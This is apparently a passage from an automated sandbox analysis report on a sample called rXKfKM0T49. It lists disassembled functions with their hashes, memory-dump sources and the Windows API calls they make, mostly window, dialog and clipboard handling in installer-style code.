                                                                                                            • Opcode ID: 073207b229952e58660d84c9d5c00c5142f076d6ed503a898597cdf8995d01c7
                                                                                                            • Instruction ID: 9b9562c2530c44cf1ede8dec84e1718cb36c03cadbf087159db288f6ed5bb765
                                                                                                            • Opcode Fuzzy Hash: 073207b229952e58660d84c9d5c00c5142f076d6ed503a898597cdf8995d01c7
                                                                                                            • Instruction Fuzzy Hash: 42C1D074E00318CFDB54DFA9C994B9DBBB2AF89300F6080A9D819AB355DB355E85CF50
                                                                                                            Function 384E5660 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: de1b9c2712d8908bf212ac4801bd5c95567dfc31c0402437d16a0d17b1eac6da
                                                                                                            • Instruction ID: df1c5f9d094db5716cacc6da27174f61f593c10307363ebd79b593dc757e6562
                                                                                                            • Opcode Fuzzy Hash: de1b9c2712d8908bf212ac4801bd5c95567dfc31c0402437d16a0d17b1eac6da
                                                                                                            • Instruction Fuzzy Hash: F3C1DF74E00318CFDB54DFA5C994BADBBB2AF89300F6080A9D819AB355DB359E81CF11
                                                                                                            Function 384E2E10 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 07b384b2b0d6d446ee8b0173b5c628dd3a8d5edc1596d5ec0e6cd9c5805a5aed
                                                                                                            • Instruction ID: c8971080390b8a5bf23a005a14a5981abb38801753f7ed8bf9ce689856b59bb6
                                                                                                            • Opcode Fuzzy Hash: 07b384b2b0d6d446ee8b0173b5c628dd3a8d5edc1596d5ec0e6cd9c5805a5aed
                                                                                                            • Instruction Fuzzy Hash: ACC1E174E00318CFDB54DFA5C994BADBBB2AF89300F5080A9D819AB355EB359E85CF10
                                                                                                            Function 384E36C0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a7e083893e9373a9198b755525bd54ec3e939e83f5be987c0e70d35b20e1bb7
                                                                                                            • Instruction ID: 8a269952ceb54c0ee4566e6684b42fc1c9d5d58417738cb8b79e9dc1ec1a35c7
                                                                                                            • Opcode Fuzzy Hash: 6a7e083893e9373a9198b755525bd54ec3e939e83f5be987c0e70d35b20e1bb7
                                                                                                            • Instruction Fuzzy Hash: DAC1DF74E00318CFDB54DFA5C994BADBBB2AF89300F5080A9D819AB355EB359E81CF10
                                                                                                            Function 384E3F70 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a89bd7be03940e652f9c9df632851810a56c01d80ab6572ea9cd4574351843f5
                                                                                                            • Instruction ID: 19f761d9ab7cf3db895ef4e26b4cc6b54bc44866576b6bd638c5bcc9b16853c0
                                                                                                            • Opcode Fuzzy Hash: a89bd7be03940e652f9c9df632851810a56c01d80ab6572ea9cd4574351843f5
                                                                                                            • Instruction Fuzzy Hash: ADC1CF74E00318CFDB54DFA5C994BADBBB2AF89300F6080A9D819AB355DB359E81CF51
                                                                                                            Function 384E5F10 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fddae9fc5167bee46e9df74471ab50181992eb5f9daabfcfff7952d1e5db573e
                                                                                                            • Instruction ID: fc7ee763392febab0858255aa02bd76830a58aab88a242b09cec3e68a7b029c9
                                                                                                            • Opcode Fuzzy Hash: fddae9fc5167bee46e9df74471ab50181992eb5f9daabfcfff7952d1e5db573e
                                                                                                            • Instruction Fuzzy Hash: 35C1DF74E00318CFDB54DFA5C994BADBBB2AF89300F5080A9D819AB355DB359E81CF10
                                                                                                            Function 384E0FA8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 364605c1713d864994751a262d9f97ec26c427d54d5d7e99ac7df630f989d099
                                                                                                            • Instruction ID: 5093a362f35ae48c94eb62ec30d3ff4dc64ec1858f25ff36a36330d7e7d3205c
                                                                                                            • Opcode Fuzzy Hash: 364605c1713d864994751a262d9f97ec26c427d54d5d7e99ac7df630f989d099
                                                                                                            • Instruction Fuzzy Hash: C7C1CF74E00218CFEB54DFA5C994BADBBB2BF89301F5080AAD419AB355DB359E81CF11
                                                                                                            Function 378AEBF2 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81cdaf03388ffd502d2b46e0102f8906a3cdc8d4d60b90edc3b89c133ac6345e
                                                                                                            • Instruction ID: 5231530fc1bc33a9f19af43a35205da21c0704a02687a1f7e1f3fa964b2f0aca
                                                                                                            • Opcode Fuzzy Hash: 81cdaf03388ffd502d2b46e0102f8906a3cdc8d4d60b90edc3b89c133ac6345e
                                                                                                            • Instruction Fuzzy Hash: ECC1C074E00318CFEB54DFA5C994BADBBB2AF89300F5080A9D419AB355DB359E85CF11
                                                                                                            Function 378AC1F2 Relevance: .3, Instructions: 267COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f8dcc4c40f5b469cbae2723f71201b6588091bebde7db8f76778810319c9b81
                                                                                                            • Instruction ID: 3353514b8f955a6fe0d2e4ec1bd54af7ae5aee5bf991cbd0f2b8e33d2d02e5c5
                                                                                                            • Opcode Fuzzy Hash: 3f8dcc4c40f5b469cbae2723f71201b6588091bebde7db8f76778810319c9b81
                                                                                                            • Instruction Fuzzy Hash: 9CC1C074E00218CFDB54DFA9C994BADBBB2BF89300F5080A9D419AB355DB355E81CF51
                                                                                                            Function 378ABD9C Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 207a8e050954e7ffd75354d8121ce61c6ac8f100266a529ff9de850a261cba92
                                                                                                            • Instruction ID: 4369f9f4f6b5a0936fed7bb207c7b3824441249855ea367907327232920f533d
                                                                                                            • Opcode Fuzzy Hash: 207a8e050954e7ffd75354d8121ce61c6ac8f100266a529ff9de850a261cba92
                                                                                                            • Instruction Fuzzy Hash: D9C1BF74E00218CFDB54DFA9C994BADBBB2AF89300F6080A9D819AB355DB355E85CF11
                                                                                                            Function 378AB4EC Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6c533184279a1060bb75b1aca4b8f2cbce76bb9bb88d5fc94bcbcbc2f118016b
                                                                                                            • Instruction ID: 82a6248c74752e54ba353c1cecda2ab744f4939fe7c0b458ec823c336ffbe03e
                                                                                                            • Opcode Fuzzy Hash: 6c533184279a1060bb75b1aca4b8f2cbce76bb9bb88d5fc94bcbcbc2f118016b
                                                                                                            • Instruction Fuzzy Hash: 89C1C174E00218CFDB54DFA9C994BADBBB2BF89300F6080A9D419AB355DB355E85CF11
                                                                                                            Function 378AF054 Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dc52cc66d088b4d9ee9b3ef28ad79a6ac1456bd32882781b39adb639b6d6d3ab
                                                                                                            • Instruction ID: 479ef7320e8df194481b438d62ae3cf6d152461fcea1451c4ac61df4494918a5
                                                                                                            • Opcode Fuzzy Hash: dc52cc66d088b4d9ee9b3ef28ad79a6ac1456bd32882781b39adb639b6d6d3ab
                                                                                                            • Instruction Fuzzy Hash: E0C1C074E00218CFDB54DFA5C994BADBBB2BF89300F6080A9D819AB355DB359E85CF11
                                                                                                            Function 378AE339 Relevance: .2, Instructions: 240COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33a82e23aa80e1d581b9915f40f44f96b25e978f0dbf916ae4f9609c3b4f87eb
                                                                                                            • Instruction ID: c85e59af30d3e6fea9452ec7b9f7d2e6e876d69a289a2178b8a749a2dd8688b7
                                                                                                            • Opcode Fuzzy Hash: 33a82e23aa80e1d581b9915f40f44f96b25e978f0dbf916ae4f9609c3b4f87eb
                                                                                                            • Instruction Fuzzy Hash: E1B1CE74E00318CFDB54DFA4C994BADBBB2AF49300F6080A9D819AB355DB35AE85CF51
                                                                                                            Function 384E8193 Relevance: .2, Instructions: 193COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8e8b1e9f5ae09011c8a12b1e22aa0e4f8c6456958c743fabbc5f79a964d47c02
                                                                                                            • Instruction ID: 60ed81b0eacd3ed5e60da44d3201db3b8baeed4d825a7adfe4ae6c1b01ec6c88
                                                                                                            • Opcode Fuzzy Hash: 8e8b1e9f5ae09011c8a12b1e22aa0e4f8c6456958c743fabbc5f79a964d47c02
                                                                                                            • Instruction Fuzzy Hash: 2DA19D74A01228CFDB64DF64C894B9ABBB2BF4A301F5085EAE40DA7350DB359E81DF51
                                                                                                            Function 384E8373 Relevance: .1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 54dc5ffd8264608b49aa58ec8a0839d48bbf764e5a60c87674d094437faeccef
                                                                                                            • Instruction ID: a6846c8497d40125fcf84221d22abac84715a1ff08ab5018d3936a23573bbe04
                                                                                                            • Opcode Fuzzy Hash: 54dc5ffd8264608b49aa58ec8a0839d48bbf764e5a60c87674d094437faeccef
                                                                                                            • Instruction Fuzzy Hash: 53516074A01328CFDB65DF64C894B99BBB2BB4A301F5085EAD40DA7350DB35AE81DF50
                                                                                                            Function 384ECBE7 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: abc4fd07a66fa7f47ec5394cd7cda5ba6e51904be13d7784bb342c244667e3c9
                                                                                                            • Instruction ID: bb3b911bce9ed1adf67a0e76732bdd83e40414bd6c42a07633587babd4a1a5c1
                                                                                                            • Opcode Fuzzy Hash: abc4fd07a66fa7f47ec5394cd7cda5ba6e51904be13d7784bb342c244667e3c9
                                                                                                            • Instruction Fuzzy Hash: DCD06774D542188BCB51DF9898406ECB370ABA9301F0024959058A7600DB709A948E56
                                                                                                            Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 184305955-3251261122
                                                                                                            • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                            Function 00403AD8 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,76F93420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1425696872
                                                                                                            • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                            Function 0040451E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
